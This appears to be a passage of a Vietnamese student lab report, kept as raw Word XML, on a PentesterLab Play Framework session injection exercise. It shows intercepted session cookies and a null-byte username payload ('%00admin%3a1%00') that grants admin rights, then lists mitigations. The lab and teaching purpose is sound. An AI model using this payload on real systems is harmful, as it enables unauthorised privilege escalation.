    <w:p w14:paraId="7640248C" w14:textId="016BC60F"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7ED2A00F">
          <v:shape id="Hình ảnh 32" o:spid="_x0000_i1094" type="#_x0000_t75" style="width:369pt;height:291pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId81" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6F6CA" w14:textId="77777777" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF65477" w14:textId="6D23C9BA" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00710054">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bước 3: Sau khi thiết lập môi trường java hoàn thành.</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tiến hành cài đặt Burpsuite,</w:t>
      </w:r>
      <w:r w:rsidR="00710054">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61130BBB" w14:textId="74EEAFEA"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48A4CA38">
          <v:shape id="_x0000_i1095" type="#_x0000_t75" style="width:330.75pt;height:220.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId82" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B5EF1C" w14:textId="0261F400"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Qúa trình cài đặt burpsuite đến đây là hoàn tất.</w:t>
      </w:r>
      <w:r w:rsidR="00710054">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Ta tiến hành giai đoạn khai thác trang web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2C76A" w14:textId="02DA626B"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Đầu tiên khởi động Burpsuite và chọn Star Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8D07F" w14:textId="02FAF5C0"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33273A79">
          <v:shape id="_x0000_i1096" type="#_x0000_t75" style="width:289.5pt;height:193.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId83" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF391AC" w14:textId="29FECD7D"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Màn hình giao diện Burpsuite xuất hiện,</w:t>
      </w:r>
      <w:r w:rsidR="00585AD7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ta chọn vào mục Proxy&gt;Intercept&gt;Intercept is on.</w:t>
      </w:r>
      <w:r w:rsidR="00180AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau đó chọn vào Open </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Browser,trình</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> duyêt web google xuất hiện,ta gán địa chỉ IP của web vào trong trình duyệt này.Qúa trình setup đến đây là hoàn tất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24283ECA" w14:textId="214AE927" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00585AD7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="7D7F8CD6">
          <v:shape id="_x0000_i1097" type="#_x0000_t75" style="width:297pt;height:154.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId84" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD93EA" w14:textId="2C78DA20"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ước đầu tiên,</w:t>
      </w:r>
      <w:r w:rsidR="00B30421">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sao khi truy cập vào website và Intercept ở chế độ On,</w:t>
      </w:r>
      <w:r w:rsidR="00B30421">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tôi thu thập được một số thông tin ở phần Intercept,</w:t>
      </w:r>
      <w:r w:rsidR="00B30421">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sao đó chuột phải copy toàn bộ dữ liệu trên sang Repeater.Khi nhấn Go tôi lấy được một số thông tin của website.</w:t>
      </w:r>
      <w:r w:rsidR="002A117B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Trang web sử dụng server Play Framework và chạy ở port :80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39204B41" w14:textId="0DD8EE79" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="007C7257">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="1F85A643">
          <v:shape id="Hình ảnh 48" o:spid="_x0000_i1098" type="#_x0000_t75" style="width:331.5pt;height:239.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId85" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F3CEE3" w14:textId="251F5E22"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Sau khi biết qua thông tin cơ bản của máy chủ,</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tôi tiến hành khảo nghiệm website bằng cách tạo một tài khoản có tên là test,</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>test1 để xem xét xử lý của phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72549EDF" w14:textId="187AB239" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="0BD228FA">
          <v:shape id="Hình ảnh 52" o:spid="_x0000_i1099" type="#_x0000_t75" style="width:468pt;height:197.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId86" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="335FCAFF" w14:textId="3F6B029D"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Sau khi đăng ký thành công account,</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sử dụng Burpsuite&gt;Intercept&gt;Copy dữ liệu sang Repeater&gt;Go, tôi nhận được play_session sau:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB6762"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PLAY_SESSION=957caaee85aa25130e11fc1d0f0bcf97e3cd60f6-%00___AT%3A06fae762870b83d480667f01af8619cdb5fcaa2c%00%00user%3Atest%00”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA1722" w14:textId="02C96521" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="70AB9D96">
          <v:shape id="Hình ảnh 58" o:spid="_x0000_i1100" type="#_x0000_t75" style="width:468pt;height:152.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId87" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="251648FF"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Tương tự ở account:test1 tôi cũng nhận được play_session như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB29B7"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PLAY_SESSION=5f9079acc22f6696df0f593dccb139ae030a69f8-%00___AT%3A06fae762870b83d480667f01af8619cdb5fcaa2c%00%00user%3Atest1%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C2B78" w14:textId="075006B9"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Ta thấy rằng với mỗi user được tạo ra,</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>thông tin của user sẽ được lưu trữ dưới dạng bản rõ trong phiên đó là: user%3Atest</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%,user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%3Atest1%.Theo ascii(%3A=: , %00=Null).Chú ý các điều đặc biệt này ta tiến hành khai thác lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C7A34"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Mục tiêu của tôi bây giờ sẽ là đưa NULL BYTEs (% 00) và dấu phân tách (% 3a) để thêm các khóa và giá trị tùy ý trong phiên. Phiên sẽ vẫn hợp lệ vì việc tiêm này được thực hiện bởi máy chủ trước khi nó ký dữ liệu. Và phiên đã sửa đổi sẽ chỉ kích hoạt hành vi không mong muốn khi nó được gửi trở lại máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408EE0A"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Login with admin Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0C49C"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ây giờ ta sẽ đưa ra trường hợp giả định rằng ứng dụng sử dụng biến của phiên có tên là admin để biết liệu người dùng có phải là quản trị viên hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A35962" w14:textId="241E97D6"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Dựa trên nhứng gì ta thấy trước đây,</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tôi biết rằng tôi cần sử dụng câu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lệnh:%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">00admin%3a1%00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8CDBB" w14:textId="28881151"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Ta tiến hành đăng ký vào website và sử dụng câu lệnh trên để đăng ký ở phần username và password là 123,</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tiến hành login ta được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E96391" w14:textId="1A0DBE93" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="007C7257">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="095B2E65">
          <v:shape id="Hình ảnh 65" o:spid="_x0000_i1101" type="#_x0000_t75" style="width:373.5pt;height:82.5pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId88" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9D62FA"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Có thể thấy phiên nhận thông tin đăng ký của ta và xuất ra giá trị với username như hình trên mặc dù không thành công trong việc chiếm quyền admin của phiên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EAFE99" w14:textId="00C8137B"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Sao đó tôi chèn:</w:t>
      </w:r>
      <w:r w:rsidR="007C7257">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>% 00admin% 3a1% 00 vào phần username của Burpsuite và nhấn Forward.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0035DBAC" w14:textId="57BDBB47" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="007C7257">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="6F7B3C87">
          <v:shape id="Hình ảnh 66" o:spid="_x0000_i1102" type="#_x0000_t75" style="width:456pt;height:191.25pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId89" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D390FC8" w14:textId="07455076" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00283404" w:rsidP="007C7257">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="7224B53D">
          <v:shape id="Hình ảnh 69" o:spid="_x0000_i1103" type="#_x0000_t75" style="width:445.5pt;height:114.75pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId90" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F2B47" w14:textId="72BF68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Bây giờ tài khoản của tôi đã đăng nhâp dưới quyền quản trị viên. Bài tập đến đây là kết thúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CBE676"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2.3 Cách phòng chống Play Session Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60550207"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Sử dụng SSL (mod_ssl) trong quá trình chứng thực để chống lại việc nghe lén dữ liệu quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383B9E9F"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Sử dụng cơ chế tạo session ID ngẫu nhiên, thuật toán mã hóa mạnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62411446"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Giới hạn thời gian tồn tại của session ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3AB73" w14:textId="77777777" w:rsidR="00F12C2B" w:rsidRPr="00F12C2B" w:rsidRDefault="00F12C2B" w:rsidP="00F12C2B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Tạo lại id phiên sau khi đăng nhập thành công. Điều này ngăn chặn việc cố định phiên vì kẻ tấn công không biết id phiên của người dùng sau khi họ đã đăng nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63585F80" w14:textId="7C82E940" w:rsidR="00F12C2B" w:rsidRPr="008228FC" w:rsidRDefault="00F12C2B" w:rsidP="008228FC">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sử dụng một số hoặc chuỗi dài ngẫu nhiên làm khóa phiên. Điều này làm giảm nguy cơ kẻ tấn công chỉ cần đoán một khóa phiên hợp lệ thông qua các cuộc tấn công thử và sai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088FB137" w14:textId="0DE6450E" w:rsidR="007056C2" w:rsidRDefault="00FA2235" w:rsidP="007056C2">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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F12C2B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00035DA4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Web for Pentester II</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCDED30" w14:textId="5AF49300" w:rsidR="007056C2" w:rsidRPr="004653AE" w:rsidRDefault="007056C2" w:rsidP="004653AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004653AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.Giới thiệu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F8F04" w14:textId="77777777" w:rsidR="007056C2" w:rsidRDefault="00035DA4" w:rsidP="007056C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Link bài lab: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B14620E" w14:textId="52286B2C" w:rsidR="007C7257" w:rsidRPr="007056C2" w:rsidRDefault="008228FC" w:rsidP="007056C2">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId91" w:history="1">
        <w:r w:rsidR="007056C2" w:rsidRPr="00AF083F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://pentesterlab.com/exercises/web_for_pentester_II/course?fbclid=IwAR3LWvfXtKkUhBk7uH3_lNlyiz42vtKrEgaWJ8NbU9qAjQPCYpKCaXs99S4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928EDD9" w14:textId="2A8F6AE1"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Trong phần bài tập này tôi sẽ trình bày chi tiết tất cả những kiến thức bạn cần biết, trước khi kiểm định xâm nhập website trong thực tế.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Phần này tập hợp khá đầy đủ các kiển thức cơ bản về web và tóm tắt các lỗ hỏng phổ biến nhất trên website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4239737A"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Trước khi tiến hành vào phần bài tập bạn cần nắm vững một số kiến thức căn bản sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310FDA66"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SQL injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A550B"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XSS injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DD669C"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HTTP cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B61975" w14:textId="53F1B849"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Session hijacking,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007056C2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Fixation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB6C7C"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CSRF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D7ADC"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Cross site Port Attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDF0B08" w14:textId="7F1496FF"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Database,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
